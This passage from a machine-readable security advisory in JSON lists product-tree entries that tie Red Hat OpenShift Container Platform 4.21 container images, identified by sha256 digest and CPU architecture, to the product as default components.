"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
